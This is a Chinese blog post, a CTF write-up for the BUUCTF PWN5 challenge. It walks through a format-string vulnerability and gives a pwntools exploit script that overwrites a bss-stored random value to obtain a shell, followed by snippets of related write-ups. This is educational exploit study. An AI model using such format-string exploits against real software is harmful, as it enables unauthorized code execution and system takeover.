Pwn篇-BUUCTF[第五空间2019 决赛]PWN5-格式化字符串漏洞

最新推荐文章于 2024-07-05 00:13:46 发布
最新推荐文章于 2024-07-05 00:13:46 发布
阅读量275 收藏 1
点赞数
分类专栏: pwn篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44644249/article/details/115584310
版权

BUUCTF[第五空间2019 决赛]PWN5

简单的格式化字符串漏洞利用题目

程序保护

在这里插入图片描述

IDA分析

  • 程序逻辑如下:
    在这里插入图片描述
  • unk_804c044为bss段地址,存储上面生成的4字节随机数。只要随机数和我们输入的passwd相等,则调用system("/bin/sh")
  • 程序中有明显的格式化字符串漏洞,可以任意地址读写。

动态调试

  • GDB调试程序,计算偏移:
    在这里插入图片描述
  • 数得偏移为9,可以使用%9p来打印"aaaa"所在的地址
  • 可以使用pwnlib中fmtstr_payload来自动构造payload,使用方法如下
payload = fmtstr_payload(12,{0x804a048:0x02223322})

EXP

from pwn import *

s = process("./pwn.out")
#s = remote("node3.buuoj.cn","29114")
context.log_level = "debug"

bss = 0x0804C044  # 随机数所存储的位置,bss地址
payload = fmtstr_payload(10,{bss:0}) # 把随机数改为0
s.recvuntil("name:")
s.sendline(payload)
s.recvuntil("passwd:")
s.sendline(p32(0))  # 设置passwd为0,此时和随机数相同,则调用system拿到shell
s.interactive()
哪家楼下的猫咪
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
PWN-Challenges
03-17
3. **格式字符串漏洞**:利用printf或scanf等函数的格式化字符串特性,通过特殊格式字符读取或修改内存。 4. **栈保护机制**:理解并绕过如Canary、NX Bit(非执行栈)和ASLR(地址空间布局随机化)等安全防护机制...
BUUCTF-PWN-[第五空间2019 决赛]PWN5
m0_64180167的博客
04-17 471
这题考到 格式化字符串的方法 我之前没有学过 根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护 nx打开 所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计 发现输入名字 他会返回名字 然后再输入密码 如果密码和unk_804c044一样 输出shellcode我们看看这个函数是什么搜索一下发现是随机数 这样我们就无法通过判断得到shellcode我们现在又两个方法。
完成ubuntu-ctf靶机渗透 最终提权得到shell权限
m0_60319766的博客
02-17 4215
完成ubuntu-ctf靶机渗透 最终提权得到shell权限
BUUCTF-PWN】7-[第五空间2019 决赛]PWN5
最新发布
燕麦葡萄干的博客
07-05 469
因此将正常的printf语句转为无参数的printf,即将参数放到格式化字符串前面构造payload,从而利用%n将前面的字符数写入到指定地址,passwd的每个字节即写入地址的值是p32(0x804c047)+p32(0x804c046)+p32(0x804c045)+p32(0x804c044)的长度,也就是4x4=16,二进制为0x10,所以passwd就是4个0x10拼接起来后的计算结果str(0x10101010)=269488144。32位小端排序,有栈溢出保护。存在格式化字符串漏洞
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 409
buuctf-pwn 001-016题wp
buuctf之[第五空间2019 决赛]PWN5
weixin_54452942的博客
04-01 655
简单易懂~
[BUUCTF]PWN——[第五空间2019 决赛]PWN5
BangSen1的博客
03-25 4483
[第五空间2019 决赛]PWN5 例行检查,32位,开启了canary保护和NX保护。 运行一下。 IDA打开,看到了/bin/sh,但开启了保护 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 按我的理解就是输入的参数的个数是不固定的,是由前面的格式化字符串决定的,所以我们只要控制了前面的格式化字符串,再结合一些参数,后面输出什么就是由我们决定的;如: %d 用于读取10进制数值 %x
02-linux pwn入门学习到放弃.pdf
09-20
02-linux pwn入门学习到放弃.pdf
gef-extras:GEF的额外优惠
03-31
在"pwn"(Payload Writing and Exploitation)领域,gef-extras提供了针对缓冲区溢出、格式字符串漏洞等常见攻击场景的专用工具。这些工具可以帮助研究人员快速定位和利用安全漏洞,构建有效的payload。 **gef-...
basics-of-pwn:我的课程是有关基本的二进制漏洞利用的。:diving_mask:
04-12
目录[堆栈溢出] [跳转到任意地址] [Shellcode编写] [NOP链] [使用python pwntools模块轻松利用堆栈溢出] [格式化字符串漏洞] [格式化字符串说明符] [读取任意数据] [开发] [堆溢出] [安全技术] [不可执行的堆栈(NX...
[第五空间2019 决赛]PWN5
qq_41853048的博客
06-15 112
今年国赛线下awdp,逆向手坐牢,临时抱佛脚吧。
buuctf pwn wp(第四波)格式化字符串漏洞系列
月阴荒的博客
04-04 3192
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上,但是我做了有一会儿了(这文章是我把当初做了时的记录素材拿过来做的...
BUUCTF 第五空间2019PWN5
Rt1Text的博客
04-23 2103
1.checksec+运行 32位/NX保护/canary保护 2.IDA进行 1.main()函数 printf()函数 考虑格式化字符串漏洞 通过0x61616161可以确定参数在第10个位置上 if ( atoi(nptr) == dword_804C044 ) { puts("ok!!"); system("/bin/sh"); } 如何拿到binsh程序也给出了 直接利用格式化字符串改写unk_804C044之的数据,然后输入数据对比得到.
buuctf [第五空间2019 决赛]PWN5
carol2358的博客
04-11 703
一道格式化字符串的题 先输入AAAA %08x %08x %08x %08x %08x %08x %08x········来确定输入首地址的偏移(找到41414141就是AAAA) 之后只要修改随机数的值,让输入和随机数的值一样就可以了 exp如下: from pwn import * context(log_level = 'debug',arch ='i386',os = 'linux' )...
[BUUCTF-pwn]——picoctf_2018_buffer overflow 0
Y_peak的博客
04-28 381
[BUUCTF-pwn]——picoctf_2018_buffer overflow 0 好久不写BUU了,手都快生了赶快过来写写。 通过观察源文件发现,首先有put函数不需要去libc找,同时argv肯定大于1,也就是需要至少两个参数,才可以到else语句,同时vuln函数的参数是第二个参数。 进入vuln函数内部看看,找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出,以此调用puts函数打印flag.因为flag在bss段上。 from pwn imp
BUUCTF--第五空间决赛pwn5
sandyyyz的博客
10-13 422
给和我一样的pwn新手参考的一次简单的格式化字符串漏洞题解析过程
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 805
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值